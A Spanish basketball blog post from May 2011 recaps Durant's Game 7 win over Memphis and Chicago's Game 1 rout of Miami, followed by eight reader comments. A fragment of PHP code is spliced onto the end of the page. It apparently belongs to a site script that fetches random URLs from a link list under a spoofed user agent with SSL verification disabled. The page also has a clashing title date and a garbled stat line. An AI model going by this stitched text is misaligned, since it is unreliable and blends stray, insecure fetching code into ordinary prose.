Playoffs (15/07/2011): La edad de los gigantes

16 de May de 2011 por TheDeerHunter

Nació en Septiembre de 1988. Tan sólo 22 años.

Kevin Durant vivió ayer su primer 7º partido después de la actuación más decepcionante de su carrera. Ganar o a casa. Sería humano que la presión pudiera afectar a un jugador tan inexperto.

Sin embargo las hazañas no nacen de las dudas y los mitos viven para esto. No pareció encogerse el brazo en el partido más increíble de cuantos le hayamos visto. Ya es.

Ayer vimos la mejor versión de los Oklahoma Thunder desde aquella primera ronda contra Lakers el curso pasado. Durant en plan leyenda, Westbrook asumiendo su papel con un triple doble y Harden mostrando su talento… Sin Ibaka en plenitud de facultades aún blindaron su zona con 11 tapones. Venían escarmentados del último roto de Randolph. Hay que destacar especialmente la labor de Collison. Luego hablaremos de ello.

A los Grizzlies no les quedó otra que rendirse a la evidencia. Fueron superados en todo. Controlar a Zach es controlar al oso. Mayo, Conley, Marc lo intentaron pero era noche sólo para dioses. Se terminó el sueño.

Y mientras, en un escenario como el United Center para otros empezaban las pesadillas. Los Heat aguantaron bien la primera parte, con un Chris Bosh superlativo que pudo contener el sólo e incluso superar la dureza de las torres locales. Un espejismo.

Poco a poco el juego interior de los Bulls fue imponiendose. 19 rebotes ofensivos nada menos, por únicamente 6 de los Heat. No hubo manera de achicar esa sangría. 19 lanzamientos más unos que otros. Merienda…

Y por parecido motivo no había manera de perforar las defensas de Chicago. Penetrar era jugar muchos números a que tocara la lotería de un taponazo y por fuera tampoco es que se vieran demasiado dulces. También en eso vencieron los Bulls con un 10 de 21 en larga distancia, destacando Deng y Rose con un acierto incluso superior al que se espera de ellos. Palizón, esta vez sí, para llorar.

MVP: Tan sólo 3 mejores actuaciones mejores que la de ayer en un primer séptimo partido. Dominique, Robertson y Calvin Murphy. Durantula ayer cazó al Grizzly con 39 puntos, 9 tapones, 3 tapones y 2 asistencias. Preocupado por su mal partido anterior…

La sorpresa: Con Ibaka renqueante se podría pensar que Oklahoma puede sufrir por dentro. Teniendo a Nick Collison pueden estar tranquilos. 8 puntos, 12 rebotes y 3 tapones no reflejan su inmensa actuación de ayer. El +26 con él en pista se aproxima un poco más a lo que sucedió. Los números de Randolph no subieron más fundamentalmente por su causa.

La decepción: Si Wade y LeBron siguen lanzando alrededor del 30% durante toda la serie los Heat lo llevan claro.

El mayor esfuerzo en vano: De forma un tanto inesperada Chris Bosh fue el mejor hombre en cancha en el United Center. El único pero reprochable a los hombres interiores locales. 30 puntos, 9 rebotes. Pero el tridente debe de tener 3 puntas y a su alrededor por dentro hace falta más.

Comenta

8 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Tremendo partido de Durant que empieza a ser una superestrella también en play-offs, donde se crean los mitos.

    Los Bulls tienen muchas armas para hacer sudar a los Heat, con el tridente Noah-Boozer-Gibson al máximo nivel solo las versiones superlativas de LeBron y Wade pueden arreglarlo.

      Citar

  2. Carlos dice:
    #2

    Yo ayer vi el partido y considero que Westbrook o Harden fueron tanto o más importantes que Durant (incluso Collison). De hecho, a Durant le falta involucrar a sus compañeros y no sólo ejecutar.

      Citar

  3. CAMPO2 dice:
    #3

    Os habéis fijado en las estadísticas de CJ Watson, en 9 minutitos 5 asistencias, eso es rentabilidad

      Citar

  4. Edd dice:
    #4

    Y pensar que muchos profetizaron un 4-0 para Miami. Lo q

      Citar

  5. MagicJohnson32 dice:
    #5

    Vaya papel está haciendo Collison, ha encontrado su rol y lo ejecuta a la perfección. Algo parecido sucede con Harden. Pinta eliminatoria realmente bonita en el Oeste.

      Citar

  6. Tobal dice:
    #6

    Que pena lo de la eliminación de los Grizzlies,pero deben de estar contentos,por la temporada extraordinaria que han hecho,eliminando a los Spurs en primera ronda y despues cayendo en el séptimo partido,frente a los Thunder,siendo una eliminatoria muy igualada.La temporada que viene,hay que contar con los Grizzlies,en el Oeste, porque si mantienen el bloque principal,serán de los mejores equipos de la conferencia,desde estas lineas quiero felicitar a los Grizzlies y a sus aficionados,por esta campaña tan excelente,la mejor de la historia de esta franquicia.

      Citar

  7. Javijaen dice:
    #7

    Bueno, he estado viendo el Heat-Bulls y la primera parte es de lo mejorcito que he visto por los dos bandos, y la segunda parte de Bulls para enmarcar. Por parte de Heat, Bosh estuvo espléndido en lo que pudo, perfecto en lo ofensivo y luchando mucho bajo aro. El problema es que estuvo prácticamente solo. Wade estuvo discreto, pero es que Lebron se empeñó en fallar y fallar en ataque, y sobre todo estuvo realmente horrible en defensa, con demasiado pasotismo, que obviamente “agradeció” Deng. Y el banquillo de Miami, demasiado desaparecido. Si a eso le sumamos que Bibby y Anthony suman 4 puntos…
    Rose hizo un partido MVP, y especialmente me gustó Boozer, y también el banquillo estuvo muy acertado en los momentos decisivos. Algo tendrá que cambiar Spoelstra para los siguientes.

      Citar

  8. GreenPride dice:
    #8

    Bueno pues noche de las buenas de playoffs. En Oklahoma, Durantula sigue empezando a escribir una leyenda que va camino de ser de las más grandes. 39 puntazos de KD por fin acompañado por una sabia dirección de Westbrook sin tirarse tantas mandarinas y asistiendo y reboteando fenomenalmente. De eso además se aprovechó un gran Harden para acompañarles y a destacar el partidazo de Collison, luchando a muerte bajo los aros. Los Grizzlies se vieron superados por su falta de lanzamiento exterior y las dificultades que pasó Z-Bo para poder anotar en este partido. Temporadón el suyo, especialmente en playoffs, si mantienen el bloque (Marc y vuelta de Gay) pueden ser un equipo que de un salto de calidad y pase a ser aspirante en los proximos años. Por su parte los Thunder confirman lo que apuntaban el año pasado y tienen mimbres para hacérselo pasar mal a los Mavs en la final de conferencia que se presenta muy interesante aunque yo apuesto que el gran banco de los Mavs podría ser decisivo.
    En el Este empezaron las finales de conferencia con una gran victoria de los Bulls. Las claves en este caso son fáciles. Si ni LeBron ni Wade llegan a 20 puntos, te ganan de 21 en puntos de triples, de 19 en puntos en segunda opción pues está todo dicho. La defensa de Chicago colapsó a los dos grandes y el banquillo de los Bulls fue mucho mejor que el de los Heat (gran partido de Gibson) Los Heat deberán encontrar mejor a sus tiradores y que éstos las metan para así dejar sitio a las penetraciones de LeBron y Wade y deberan hacer mucho mejor trabajo con los rebotes. El segundo partido será muy interesante, a ver que tal ajustan. Por cierto, partidazo de Bosh prácticamente sólo bajo los aros por Miami

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>